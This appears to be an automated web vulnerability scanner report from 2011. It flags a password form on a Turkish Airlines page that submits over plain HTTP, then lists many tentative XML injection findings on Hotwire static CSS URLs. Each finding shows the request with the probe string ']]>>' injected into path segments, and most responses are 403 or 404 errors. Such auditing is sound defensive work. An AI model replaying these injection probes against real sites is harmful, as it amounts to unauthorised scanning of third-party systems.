Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
</label>
<input style="width:145px;" type="password" class="medium float-left" name="j_password" id="texta2" maxlength="6" />
</div>
...[SNIP]...
8. XML injection  previous  next
There are 224 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

8.1. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/??css/hotelDetails-sprite.css,css/purchasePath-sprite.css,css/details.css,css/hotels-sprite.css,css/tripWatcherLayout.css,css/promoUnit.css,ver=222153 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:01:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 1025

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.2. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/??css/hotelDetails-sprite.css,css/purchasePath-sprite.css,css/details.css,css/hotels-sprite.css,css/tripWatcherLayout.css,css/promoUnit.css,ver=222153 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:01:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 1025

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.3. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/BedTypeSelectionComp.css?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:20 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.4. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/BedTypeSelectionComp.css?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.5. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/BedTypeSelectionComp.css?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.6. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/BedTypeSelectionComp.css]]>>?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.7. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/car/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.8. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/car/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535976
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.9. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/car/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.10. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/car]]>>/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535954
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.11. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/car/CarAddOnComp.css]]>>?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.12. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/hotel/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:21 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.13. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/hotel/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.14. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/hotel/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:29 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.15. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel]]>>/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.16. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details]]>>/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
